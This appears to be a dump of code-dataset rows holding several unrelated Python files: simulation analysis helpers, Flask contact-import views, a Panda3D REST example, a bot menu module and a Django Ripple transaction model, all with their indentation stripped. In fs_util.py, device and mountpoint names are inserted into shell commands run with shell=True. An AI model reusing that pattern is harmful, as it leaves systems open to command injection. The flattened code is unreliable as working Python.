cell_type='consumers', mean='amean')
pmax = sim.get_mean_surf_concn(detail_level, sif_name,
cell_type='producers', mean='amean')
d = sim.get_mean_NN_dist(detail_level, mean=dist_mean)
estimates.append(D*self.producers*sides*(pmax-pmin)/d)
return estimates
def find_sim_collections(results_dir, diffs_allowed=['random_seed']):
sim_collections = []
for sim in get_replicate_simulations(results_dir):
sim_collection = None
for sc in sim_collections:
if sc.add_if_belongs(sim):
sim_collection = sc
break
if sim_collection == None:
sim_collection = SimCollection(sim)
sim_collections.append(sim_collection)
return sim_collections
# points should be given as a 2xn numpy.array
# side_length should be a positive real number (usually an integer)
def wrap_points(points, side_length, num_wraps=1, is_3d=False):
diffs = [i*side_length for i in range(num_wraps+1)]
diffs.extend([-d for d in diffs[1:]])
new_points = []
for point in points:
for x_diff in diffs:
for y_diff in diffs:
if is_3d:
for z_diff in diffs:
new_points.append(point + (x_diff, y_diff, z_diff))
else:
new_points.append(point + (x_diff, y_diff))
return numpy.array(new_points)
def every_cell_spatial_stats(root_dir, detail_level=1):
results_file = get_detail_level_results(root_dir, detail_level=detail_level)
results_file.get_space_parameters()
points = numpy.array([e.position() for e in results_file.events])
if results_file.wrapping:
points = wrap_points(points, results_file.side_length,
is_3d=results_file.is_3d)
triangulation = Delaunay(points)
indices, indptr = triangulation.vertex_neighbor_vertices
for event in results_file.events:
e_point = numpy.array(event.position())
row_number = toolbox_basic.find_index_of_row_in_array(points, e_point)
event.vars['eDT_nnbs'] = indices[row_number+1] - indices[row_number] +1
neighbor_indices = indptr[indices[row_number]:indices[row_number+1]]
nb_points = [points[i] for i in neighbor_indices]
def get_replicate_results(replicates_dir):
replicates_dir = toolbox_basic.check_path(replicates_dir)
results_path = os.path.join(replicates_dir, 'results.xml')
results_file = ReplicatesFile(path=results_path)
return results_file
def get_replicate_simulations(replicates_dir):
return [Simulation(d) for d in toolbox_basic.subdir_list(replicates_dir)]
def setup_replicate_results(replicates_dir):
results_file = get_replicate_results(replicates_dir)
replicate_simulations = get_replicate_simulations(replicates_dir)
wrapping = replicate_simulations[0].wrapping
is_3d=replicate_simulations[0].is_3d
side_length=replicate_simulations[0].side_length
results_file.set_space_parameters(wrapping=wrapping, is_3d=is_3d, side_length=side_length)
for sim in replicate_simulations:
if not ((sim.wrapping == wrapping) and
(sim.is_3d == is_3d) and
(sim.side_length == side_length)):
toolbox_basic.error_message('toolbox_elmer.get_replicates_results():'+
'Replicates have different space parameters', replicates_dir)
exit()
results_file.write()
return results_file
def get_replicate_results_basics(replicates_dir,
detail_level=1, sif_name='elmer_standard'):
replicate_simulations = get_replicate_simulations(replicates_dir)
results_file = setup_replicate_results(replicates_dir)
dl_resuls = results_file.get_detail_level_results(detail_level=detail_level)
sif_results = results_file.get_solver_input_file_results(
detail_level=detail_level, sif_name=sif_name)
#for sim in replicate_simulations:
results_file.write()
def hydrogen_logo(axis, bottom_left=(0.9, 0.9), height_width=0.1):
color = '0.5'
circle = toolbox_schematic.Circle()
circle.set_defaults(edgecolor='none', facecolor=color, transform=True)
radius = 0.2*height_width
center_A = (bottom_left[0] + radius, bottom_left[1] + height_width - radius)
center_B = (bottom_left[0] + height_width - radius, bottom_left[1] + radius)
circle.set_points(center_A, radius)
circle.draw(axis)
circle.set_points(center_B, radius)
circle.draw(axis)
print center_A, center_B
axis.plot([center_A[0], center_B[0]], [center_A[1], center_B[1]], color, linestyle='-', transform=axis.transAxes)
#center = ((bottom_left[0]+top_right[0])/2, (bottom_left[1]+top_right[1])/2)
'''
def get_combined_results(root_dir, detail_level=1, sif_name='elmer_standard'):
dl_results = get_detail_level_results(root_dir, detail_level=detail_level)
run_results = get_run_results(root_dir,
detail_level=detail_level, sif_name=sif_name)
for e in run_results.events:
for o in dl_results.events:
if o.position() == e.position():
for attrib in o.vars.keys():
e.vars[attrib] = o.vars[attrib]
run_results.set_read_only()
return run_results
'''
'''
def get_rate_array(root_dir, detail_level=1, sif_name='elmer_standard'):
run_dir = get_run_dir(root_dir,detail_level=detail_level,sif_name=sif_name)
array_path = os.path.join(run_dir, 'rate_array.npy')
array_path = toolbox_basic.check_path(array_path)
array = numpy.load(array_path)
return array
'''
'''
def calc_nearest_neighbor_distances(root_dir, detail_level=1):
simulation = Simulation(root_dir)
results_file = simulation.get_detail_level_results(detail_level)
#if ('eNN_dist' in results_file.get_eventList_column_names()): return
if results_file.is_event_list_column_name('eNN_dist'): return
#results_file.set_space_parameters()
cons_points = numpy.array([e.position() for e in results_file.consumers()])
prod_points = numpy.array([e.position() for e in results_file.producers()])
if simulation.wrapping:
cons_points = wrap_points(cons_points, simulation.side_length,
is_3d=simulation.is_3d)
prod_points = wrap_points(prod_points, simulation.side_length,
is_3d=simulation.is_3d)
cons_tree = KDTree(cons_points)
prod_tree = KDTree(prod_points)
for e in results_file.events:
c_dist, id = cons_tree.query(e.position())
p_dist, id = prod_tree.query(e.position())
e.vars['sNN_dist'] = c_dist if (e.vars['mark'] == 2) else p_dist
e.vars['oNN_dist'] = c_dist if (e.vars['mark'] == 3) else p_dist
e.vars['eNN_dist'] = min(c_dist, p_dist)
results_file.add_event_list_column_name('eNN_dist')
results_file.add_event_list_column_name('oNN_dist')
results_file.add_event_list_column_name('sNN_dist')
results_file.eventList.update_text()
results_file.write()
'''
| en | 0.486112 | #/usr/bin/python # Set up the space from the protocol file. # This isn't quite correct! Without wrapping, Elmer skips some nodes %s\n1 ### Make mesh.header # The 2 denotes dimensions, 202's are boundaries, 404's are elements. ### Make mesh.nodes # Shouldn't this take account of detail_level? # Consider changing this line to #text += '%d -1 %.1f %.1f 0.0\n' %(i+1, x, y) ### Make mesh.elements ### Make mesh.boundary # Along the bottom of the array (x=max) from left (y=0) to right (y=max). # Down the left of the array (y=0), from top (x=0) to bottom (x=max). # Along the top of the array (x=0) from left (y=0) to right (y=max). # Down the left of the array (y=max), from top (x=0) to bottom (x=max). # If cells_file.events is empty then the detail level directory has # probably only just been created, and this file does not yet exist. # Finally, update and save the 'cell_locations.xml' file. #rf.eventList.update_text() #axis.set_xlabel(r'Product concentration ($\mu$M)') #self.plot_rate_array(axis, detail_level, sif_name) #label = r'Product concentration ($\mu$M)' # This doesn't take account of detail_level! 
# See update_concn_rate_results() # This is a bit of a fudge: set_concn_rate_results() implicitly assumes # detail_level = 1 # If detail_level is odd: # If detail_level is even: # Take care of any edge effects: # points should be given as a 2xn numpy.array # side_length should be a positive real number (usually an integer) #for sim in replicate_simulations: #center = ((bottom_left[0]+top_right[0])/2, (bottom_left[1]+top_right[1])/2) def get_combined_results(root_dir, detail_level=1, sif_name='elmer_standard'): dl_results = get_detail_level_results(root_dir, detail_level=detail_level) run_results = get_run_results(root_dir, detail_level=detail_level, sif_name=sif_name) for e in run_results.events: for o in dl_results.events: if o.position() == e.position(): for attrib in o.vars.keys(): e.vars[attrib] = o.vars[attrib] run_results.set_read_only() return run_results def get_rate_array(root_dir, detail_level=1, sif_name='elmer_standard'): run_dir = get_run_dir(root_dir,detail_level=detail_level,sif_name=sif_name) array_path = os.path.join(run_dir, 'rate_array.npy') array_path = toolbox_basic.check_path(array_path) array = numpy.load(array_path) return array def calc_nearest_neighbor_distances(root_dir, detail_level=1): simulation = Simulation(root_dir) results_file = simulation.get_detail_level_results(detail_level) #if ('eNN_dist' in results_file.get_eventList_column_names()): return if results_file.is_event_list_column_name('eNN_dist'): return #results_file.set_space_parameters() cons_points = numpy.array([e.position() for e in results_file.consumers()]) prod_points = numpy.array([e.position() for e in results_file.producers()]) if simulation.wrapping: cons_points = wrap_points(cons_points, simulation.side_length, is_3d=simulation.is_3d) prod_points = wrap_points(prod_points, simulation.side_length, is_3d=simulation.is_3d) cons_tree = KDTree(cons_points) prod_tree = KDTree(prod_points) for e in results_file.events: c_dist, id = cons_tree.query(e.position()) p_dist, id 
= prod_tree.query(e.position()) e.vars['sNN_dist'] = c_dist if (e.vars['mark'] == 2) else p_dist e.vars['oNN_dist'] = c_dist if (e.vars['mark'] == 3) else p_dist e.vars['eNN_dist'] = min(c_dist, p_dist) results_file.add_event_list_column_name('eNN_dist') results_file.add_event_list_column_name('oNN_dist') results_file.add_event_list_column_name('sNN_dist') results_file.eventList.update_text() results_file.write() | 2.023053 | 2 |
oleander/views/contacts.py | honzajavorek/oleander | 0 | 6623869 | # -*- coding: utf-8 -*-
from flask import render_template, redirect, url_for, request, flash, session
from flask.ext.login import login_required, current_user
from oleander import app, db, facebook, google
from oleander.forms import EmailContactForm
from oleander.models import Contact, FacebookContact, GoogleContact, EmailContact
from gdata.contacts.client import ContactsQuery
def create_email_contact(email):
if email.endswith(('gmail.com', 'googlemail.com')):
return GoogleContact()
return EmailContact()
@app.route('/contacts/', methods=('GET', 'POST'))
@login_required
def contacts():
"""Contacts management page."""
form = EmailContactForm()
if form.validate_on_submit():
with db.transaction as session:
contact = create_email_contact(form.email.data)
form.populate_obj(contact)
contact.user = current_user
session.add(contact)
return redirect(url_for('contacts'))
contacts = current_user.contacts.order_by('name')
return render_template('contacts.html', form=form, contacts=contacts)
@app.route('/contacts/delete/<int:id>')
@login_required
def delete_contact(id):
"""Removes contact by ID."""
contact = current_user.get_contact_or_404(id)
if contact.is_primary:
flash('Cannot delete primary contact.')
elif list(contact.attendance):
flash('Cannot delete contact involved in events.')
else:
with db.transaction as session:
current_user.delete_contact(id)
return redirect(url_for('contacts'))
@app.route('/contacts/import/facebook')
@login_required
def import_facebook_friends():
try:
api = facebook.create_api()
me = api.get('me')
friends = api.get('me/friends')['data']
friends.append(me)
for friend in friends:
with db.transaction as session:
contact = current_user.find_facebook_contact(friend['id'])
if not contact:
contact = FacebookContact()
contact.name = friend['name']
contact.facebook_id = friend['id']
contact.user = current_user
contact.belongs_to_user = friend['id'] == me['id']
session.add(contact)
else:
contact.name = friend['name']
return redirect(url_for('contacts'))
except (facebook.ConnectionError, facebook.OAuthError):
return redirect(facebook.create_authorize_url(
action_url=url_for('import_facebook_friends'),
error_url=url_for('contacts')
))
@app.route('/contacts/import/google')
@login_required
def import_google_contacts():
try:
api = google.create_api(google.ContactsClient)
group_id = None
feed = api.GetGroups()
for entry in feed.entry:
if entry.title.text == 'System Group: My Contacts':
group_id = entry.id.text
query = ContactsQuery()
query.max_results = 10000
if group_id:
query.group = group_id
feed = api.GetContacts(q=query)
my_emails = current_user.emails
for entry in feed.entry:
with db.transaction as session:
for email in entry.email:
if not entry.name or not entry.name.full_name:
continue
contact = current_user.find_email_contact(email.address)
if not contact:
contact = create_email_contact(email.address)
contact.name = entry.name.full_name.text
contact.email = email.address
contact.user = current_user
contact.belongs_to_user = email.address in my_emails
session.add(contact)
else:
contact.name = entry.name.full_name.text
return redirect(url_for('contacts'))
except (google.ConnectionError, google.UnauthorizedError):
return redirect(google.create_authorize_url(
action_url=url_for('import_google_contacts'),
error_url=url_for('contacts'),
scope='https://www.google.com/calendar/feeds/ https://www.google.com/m8/feeds/'
)) | # -*- coding: utf-8 -*-
from flask import render_template, redirect, url_for, request, flash, session
from flask.ext.login import login_required, current_user
from oleander import app, db, facebook, google
from oleander.forms import EmailContactForm
from oleander.models import Contact, FacebookContact, GoogleContact, EmailContact
from gdata.contacts.client import ContactsQuery
def create_email_contact(email):
if email.endswith(('gmail.com', 'googlemail.com')):
return GoogleContact()
return EmailContact()
@app.route('/contacts/', methods=('GET', 'POST'))
@login_required
def contacts():
"""Contacts management page."""
form = EmailContactForm()
if form.validate_on_submit():
with db.transaction as session:
contact = create_email_contact(form.email.data)
form.populate_obj(contact)
contact.user = current_user
session.add(contact)
return redirect(url_for('contacts'))
contacts = current_user.contacts.order_by('name')
return render_template('contacts.html', form=form, contacts=contacts)
@app.route('/contacts/delete/<int:id>')
@login_required
def delete_contact(id):
"""Removes contact by ID."""
contact = current_user.get_contact_or_404(id)
if contact.is_primary:
flash('Cannot delete primary contact.')
elif list(contact.attendance):
flash('Cannot delete contact involved in events.')
else:
with db.transaction as session:
current_user.delete_contact(id)
return redirect(url_for('contacts'))
@app.route('/contacts/import/facebook')
@login_required
def import_facebook_friends():
try:
api = facebook.create_api()
me = api.get('me')
friends = api.get('me/friends')['data']
friends.append(me)
for friend in friends:
with db.transaction as session:
contact = current_user.find_facebook_contact(friend['id'])
if not contact:
contact = FacebookContact()
contact.name = friend['name']
contact.facebook_id = friend['id']
contact.user = current_user
contact.belongs_to_user = friend['id'] == me['id']
session.add(contact)
else:
contact.name = friend['name']
return redirect(url_for('contacts'))
except (facebook.ConnectionError, facebook.OAuthError):
return redirect(facebook.create_authorize_url(
action_url=url_for('import_facebook_friends'),
error_url=url_for('contacts')
))
@app.route('/contacts/import/google')
@login_required
def import_google_contacts():
try:
api = google.create_api(google.ContactsClient)
group_id = None
feed = api.GetGroups()
for entry in feed.entry:
if entry.title.text == 'System Group: My Contacts':
group_id = entry.id.text
query = ContactsQuery()
query.max_results = 10000
if group_id:
query.group = group_id
feed = api.GetContacts(q=query)
my_emails = current_user.emails
for entry in feed.entry:
with db.transaction as session:
for email in entry.email:
if not entry.name or not entry.name.full_name:
continue
contact = current_user.find_email_contact(email.address)
if not contact:
contact = create_email_contact(email.address)
contact.name = entry.name.full_name.text
contact.email = email.address
contact.user = current_user
contact.belongs_to_user = email.address in my_emails
session.add(contact)
else:
contact.name = entry.name.full_name.text
return redirect(url_for('contacts'))
except (google.ConnectionError, google.UnauthorizedError):
return redirect(google.create_authorize_url(
action_url=url_for('import_google_contacts'),
error_url=url_for('contacts'),
scope='https://www.google.com/calendar/feeds/ https://www.google.com/m8/feeds/'
)) | en | 0.776937 | # -*- coding: utf-8 -*- Contacts management page. Removes contact by ID. | 2.631317 | 3 |
examples/01-json-get.py | NxtGames/p3d-rest | 1 | 6623870 | """
Author: <NAME>
Written: 07/30/2019
The MIT License (MIT)
Copyright (c) 2019 Nxt Games
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
of the Software, and to permit persons to whom the Software is furnished to do
so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from panda3d_rest import http
from direct.showbase.ShowBase import ShowBase
base = ShowBase()
def handle_ip(data):
"""
Handles the callback data
"""
ip = data.get('ip', 'unknown')
print('My public ip is: %s' % ip)
base.rest = http.HTTPRest()
base.rest.setup()
base.rest.perform_json_get_request('https://api.ipify.org/?format=json', callback=handle_ip)
base.run() | """
Author: <NAME>
Written: 07/30/2019
The MIT License (MIT)
Copyright (c) 2019 Nxt Games
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
of the Software, and to permit persons to whom the Software is furnished to do
so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from panda3d_rest import http
from direct.showbase.ShowBase import ShowBase
base = ShowBase()
def handle_ip(data):
"""
Handles the callback data
"""
ip = data.get('ip', 'unknown')
print('My public ip is: %s' % ip)
base.rest = http.HTTPRest()
base.rest.setup()
base.rest.perform_json_get_request('https://api.ipify.org/?format=json', callback=handle_ip)
base.run() | en | 0.763082 | Author: <NAME> Written: 07/30/2019 The MIT License (MIT) Copyright (c) 2019 Nxt Games Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. Handles the callback data | 1.929084 | 2 |
qbert/extraction_api.py | StrangeTcy/Q-BERT | 57 | 6623871 | <gh_stars>10-100
import requests
import json
import random
import time
def call_askbert(sentence, threshold=0.2, attribute=True):
url = "http://localhost:5000/"
response = requests.request("POST", url, data={"state": sentence, "threshold": threshold, "attribute": attribute})
response = json.JSONDecoder().decode(response.text)
return response
def set_batch_mode(batch_size):
url = "http://localhost:8081/models"
querystring = {"url": "albert.mar", "batch_size": batch_size, "max_batch_delay": "100", "initial_workers": "1"}
response = requests.request("POST", url, params=querystring)
print(response.text)
| import requests
import json
import random
import time
def call_askbert(sentence, threshold=0.2, attribute=True):
url = "http://localhost:5000/"
response = requests.request("POST", url, data={"state": sentence, "threshold": threshold, "attribute": attribute})
response = json.JSONDecoder().decode(response.text)
return response
def set_batch_mode(batch_size):
url = "http://localhost:8081/models"
querystring = {"url": "albert.mar", "batch_size": batch_size, "max_batch_delay": "100", "initial_workers": "1"}
response = requests.request("POST", url, params=querystring)
print(response.text) | none | 1 | 2.807881 | 3 | |
Codeforces/A_Postcards_and_photos.py | anubhab-code/Competitive-Programming | 0 | 6623872 | s=input()
c=0
t=0
old=""
for i in s:
if i==old:
c+=1
if c>=5 or i!=old:
t+=1
c=0
old=i
print(t) | s=input()
c=0
t=0
old=""
for i in s:
if i==old:
c+=1
if c>=5 or i!=old:
t+=1
c=0
old=i
print(t) | none | 1 | 3.494359 | 3 | |
fs_util.py | akhandpuresoftware/rawfile-localpv | 38 | 6623873 | <filename>fs_util.py
import json
import os
import subprocess
def path_stats(path):
fs_stat = os.statvfs(path)
return {
"fs_size": fs_stat.f_frsize * fs_stat.f_blocks,
"fs_avail": fs_stat.f_frsize * fs_stat.f_bavail,
"fs_files": fs_stat.f_files,
"fs_files_avail": fs_stat.f_favail,
}
def device_stats(dev):
output = subprocess.run(
f"blockdev --getsize64 {dev}", shell=True, check=True, capture_output=True
).stdout.decode()
dev_size = int(output)
return {"dev_size": dev_size}
def dev_to_mountpoint(dev_name):
try:
output = subprocess.run(
f"findmnt --json --first-only {dev_name}",
shell=True,
check=True,
capture_output=True,
).stdout.decode()
data = json.loads(output)
return data["filesystems"][0]["target"]
except subprocess.CalledProcessError:
return None
def mountpoint_to_dev(mountpoint):
res = subprocess.run(
f"findmnt --json --first-only --nofsroot --mountpoint {mountpoint}",
shell=True,
capture_output=True,
)
if res.returncode != 0:
return None
data = json.loads(res.stdout.decode().strip())
return data["filesystems"][0]["source"]
| <filename>fs_util.py
import json
import os
import subprocess
def path_stats(path):
fs_stat = os.statvfs(path)
return {
"fs_size": fs_stat.f_frsize * fs_stat.f_blocks,
"fs_avail": fs_stat.f_frsize * fs_stat.f_bavail,
"fs_files": fs_stat.f_files,
"fs_files_avail": fs_stat.f_favail,
}
def device_stats(dev):
output = subprocess.run(
f"blockdev --getsize64 {dev}", shell=True, check=True, capture_output=True
).stdout.decode()
dev_size = int(output)
return {"dev_size": dev_size}
def dev_to_mountpoint(dev_name):
try:
output = subprocess.run(
f"findmnt --json --first-only {dev_name}",
shell=True,
check=True,
capture_output=True,
).stdout.decode()
data = json.loads(output)
return data["filesystems"][0]["target"]
except subprocess.CalledProcessError:
return None
def mountpoint_to_dev(mountpoint):
res = subprocess.run(
f"findmnt --json --first-only --nofsroot --mountpoint {mountpoint}",
shell=True,
capture_output=True,
)
if res.returncode != 0:
return None
data = json.loads(res.stdout.decode().strip())
return data["filesystems"][0]["source"]
| none | 1 | 2.168661 | 2 | |
menu.py | sarfarazstark/To-Do-Bot | 4 | 6623874 | <reponame>sarfarazstark/To-Do-Bot
"""Module for sending menus to user"""
from keyboards import get_menu_keyboard, get_tasks_keyboard
from messages import get_signboard, get_message
from languages import get_user_language
# Sender for the top-level menu
def send_main_menu(update):
    """Reply to the user with the main menu, localised to their language."""
    lang = get_user_language(update=update, short=True)
    text = get_signboard("main_menu", lang)
    keyboard = get_menu_keyboard("main_menu", lang)
    update.message.reply_text(text, reply_markup=keyboard)
# Sender for the task-editor menu
def send_editor_menu(update):
    """Reply to the user with the editor menu, localised to their language."""
    lang = get_user_language(update=update, short=True)
    text = get_signboard("editor_menu", lang)
    keyboard = get_menu_keyboard("editor_menu", lang)
    update.message.reply_text(text, reply_markup=keyboard)
# Sender for the settings menu
def send_settings_menu(update):
    """Reply to the user with the settings menu, localised to their language."""
    lang = get_user_language(update=update, short=True)
    text = get_signboard("settings_menu", lang)
    keyboard = get_menu_keyboard("settings_menu", lang)
    update.message.reply_text(text, reply_markup=keyboard)
# Sender for the per-task edit-action menu
def send_edit_mode_menu(update):
    """Ask the user which edit action to perform, with the edit-task keyboard."""
    lang = get_user_language(update=update, short=True)
    prompt = get_message("choice_action", lang)
    keyboard = get_menu_keyboard("edit_task_menu", lang)
    update.message.reply_text(prompt, reply_markup=keyboard)
# Sender for the task-selection menu (paginated)
def send_choice_tasks_menu(update, page=0):
    """Show the task-selection keyboard for the requesting user.

    Returns True when the menu was sent, False when the user has no tasks
    (i.e. no keyboard could be built).
    """
    user_id = update.message.from_user.id
    lang = get_user_language(user_id=user_id, short=True)
    keyboard = get_tasks_keyboard(user_id, lang, page=page)
    if not keyboard:
        # Nothing to choose from -> no message is sent.
        return False
    update.message.reply_text(get_message("choice_task", lang),
                              reply_markup=keyboard)
    return True
| """Module for sending menus to user"""
from keyboards import get_menu_keyboard, get_tasks_keyboard
from messages import get_signboard, get_message
from languages import get_user_language
# Function for sending main menu
def send_main_menu(update):
# Get user language
language = get_user_language(update=update, short=True)
# Send menu
update.message.reply_text(
get_signboard("main_menu", language),
reply_markup=get_menu_keyboard("main_menu", language)
)
# Function for sending editor menu
def send_editor_menu(update):
# Get user language
language = get_user_language(update=update, short=True)
# Send menu
update.message.reply_text(
get_signboard("editor_menu", language),
reply_markup=get_menu_keyboard("editor_menu", language)
)
# Function for sending settings menu
def send_settings_menu(update):
# Get user language
language = get_user_language(update=update, short=True)
# Send menu
update.message.reply_text(
get_signboard("settings_menu", language),
reply_markup=get_menu_keyboard("settings_menu", language)
)
# Function for sending edit task menu
def send_edit_mode_menu(update):
# Get user language
language = get_user_language(update=update, short=True)
# Send menu
update.message.reply_text(
get_message("choice_action", language),
reply_markup=get_menu_keyboard("edit_task_menu", language)
)
# Function for sending menu for tasks choice
def send_choice_tasks_menu(update, page=0):
# Get user id and user language
user_id = update.message.from_user.id
language = get_user_language(user_id=user_id, short=True)
# Get tasks keyboard
keyboard = get_tasks_keyboard(user_id, language, page=page)
# If keyboard doesn't exist - return False
if not keyboard:
return False
# Send menu
update.message.reply_text(
get_message("choice_task", language),
reply_markup=keyboard
)
# Return True, if message sent
return True | en | 0.686723 | Module for sending menus to user # Function for sending main menu # Get user language # Send menu # Function for sending editor menu # Get user language # Send menu # Function for sending settings menu # Get user language # Send menu # Function for sending edit task menu # Get user language # Send menu # Function for sending menu for tasks choice # Get user id and user language # Get tasks keyboard # If keyboard doesn't exist - return False # Send menu # Return True, if message sent | 2.785647 | 3 |
ripple_api/models.py | 42cc/ripple_api | 7 | 6623875 | # -*- coding: utf-8 -*-
from django.db import models
from django.utils.translation import ugettext_lazy as _
from model_utils import ModelTracker
from signals import transaction_status_changed, transaction_failure_send
class Transaction(models.Model):
    """Ripple payment transaction with a tracked status lifecycle.

    Status transitions are observed with a ModelTracker; see save() for the
    signals fired on status change and on FAILURE.
    """
    # Status lifecycle constants (stored in the ``status`` field).
    RECEIVED = 0
    PROCESSED = 1
    MUST_BE_RETURN = 2
    RETURNING = 3
    RETURNED = 4
    PENDING = 5
    SUBMITTED = 6
    FAILURE = 7
    SUCCESS = 8
    CREATED = 9
    SUCCESS_PROCESSED = 10
    FAIL_FIXED = 100
    STATUS_CHOICES = (
        (RECEIVED, _(u'Transaction received')),
        (PROCESSED, _(u'Transaction was processed')),
        (MUST_BE_RETURN, _(u'This transaction must be returned to user')),
        (RETURNING, _(u'Created new transaction for returning')),
        (RETURNED, _(u'Transaction was returned')),
        (PENDING, _(u'Pending to submit')),
        (SUBMITTED, _(u'Transaction was submitted')),
        (FAILURE, _(u'Transaction was failed')),
        (SUCCESS, _(u'Transaction was completed successfully')),
        (CREATED, _(u'Transaction was created but not sign')),
        (SUCCESS_PROCESSED,
         _(u'Transaction was processed after successful submit')),
        (FAIL_FIXED, _(u'The failed transaction was fixed by a new retry'))
    )
    # Ripple account addresses of the sender and receiver.
    account = models.CharField(max_length=100)
    destination = models.CharField(max_length=100)
    # Transaction hash and signed blob, filled in once known.
    hash = models.CharField(max_length=100, blank=True)
    tx_blob = models.TextField(blank=True)
    # Amount description: 3-letter currency code, issuing gateway, and value
    # kept as a string (avoids float precision issues).
    currency = models.CharField(max_length=3)
    issuer = models.CharField(max_length=100)
    value = models.CharField(max_length=100)
    source_tag = models.IntegerField(null=True, blank=True)
    destination_tag = models.IntegerField(null=True, blank=True)
    ledger_index = models.IntegerField(null=True, blank=True)
    status = models.SmallIntegerField(choices=STATUS_CHOICES, default=RECEIVED)
    # A return transaction points at the transaction it is returning.
    parent = models.ForeignKey('self', null=True, blank=True,
                               related_name='returning_transaction')
    created = models.DateTimeField(auto_now_add=True)
    # Tracks previous value of ``status`` across saves (model_utils).
    status_tracker = ModelTracker(fields=['status'])
    def __unicode__(self):
        # Human-readable summary used in the admin / logs.
        return u'[%s] %s. %s %s from %s to %s' % (
            self.pk, self.created, self.value,
            self.currency, self.account, self.destination
        )
    def save(self, *args, **kwargs):
        """Save and fire status-change / failure signals.

        NOTE(review): despite its name, ``created`` is True when the object
        already has a primary key (an UPDATE, not a new row), so the
        status-changed signal only fires for existing rows -- confirm this
        is the intended trigger condition.
        """
        created = bool(self.pk)
        super(Transaction, self).save(*args, **kwargs)
        if created and self.status_tracker.previous('status') is not None:
            transaction_status_changed.send(
                sender=self.__class__,
                instance=self,
                old_status=self.status_tracker.previous('status')
            )
        if self.status == self.FAILURE:
            # Fired on every save performed while status is FAILURE.
            transaction_failure_send.send(sender=self.__class__, instance=self)
| # -*- coding: utf-8 -*-
from django.db import models
from django.utils.translation import ugettext_lazy as _
from model_utils import ModelTracker
from signals import transaction_status_changed, transaction_failure_send
class Transaction(models.Model):
RECEIVED = 0
PROCESSED = 1
MUST_BE_RETURN = 2
RETURNING = 3
RETURNED = 4
PENDING = 5
SUBMITTED = 6
FAILURE = 7
SUCCESS = 8
CREATED = 9
SUCCESS_PROCESSED = 10
FAIL_FIXED = 100
STATUS_CHOICES = (
(RECEIVED, _(u'Transaction received')),
(PROCESSED, _(u'Transaction was processed')),
(MUST_BE_RETURN, _(u'This transaction must be returned to user')),
(RETURNING, _(u'Created new transaction for returning')),
(RETURNED, _(u'Transaction was returned')),
(PENDING, _(u'Pending to submit')),
(SUBMITTED, _(u'Transaction was submitted')),
(FAILURE, _(u'Transaction was failed')),
(SUCCESS, _(u'Transaction was completed successfully')),
(CREATED, _(u'Transaction was created but not sign')),
(SUCCESS_PROCESSED,
_(u'Transaction was processed after successful submit')),
(FAIL_FIXED, _(u'The failed transaction was fixed by a new retry'))
)
account = models.CharField(max_length=100)
destination = models.CharField(max_length=100)
hash = models.CharField(max_length=100, blank=True)
tx_blob = models.TextField(blank=True)
currency = models.CharField(max_length=3)
issuer = models.CharField(max_length=100)
value = models.CharField(max_length=100)
source_tag = models.IntegerField(null=True, blank=True)
destination_tag = models.IntegerField(null=True, blank=True)
ledger_index = models.IntegerField(null=True, blank=True)
status = models.SmallIntegerField(choices=STATUS_CHOICES, default=RECEIVED)
parent = models.ForeignKey('self', null=True, blank=True,
related_name='returning_transaction')
created = models.DateTimeField(auto_now_add=True)
status_tracker = ModelTracker(fields=['status'])
def __unicode__(self):
return u'[%s] %s. %s %s from %s to %s' % (
self.pk, self.created, self.value,
self.currency, self.account, self.destination
)
def save(self, *args, **kwargs):
created = bool(self.pk)
super(Transaction, self).save(*args, **kwargs)
if created and self.status_tracker.previous('status') is not None:
transaction_status_changed.send(
sender=self.__class__,
instance=self,
old_status=self.status_tracker.previous('status')
)
if self.status == self.FAILURE:
transaction_failure_send.send(sender=self.__class__, instance=self)
| en | 0.769321 | # -*- coding: utf-8 -*- | 1.988554 | 2 |
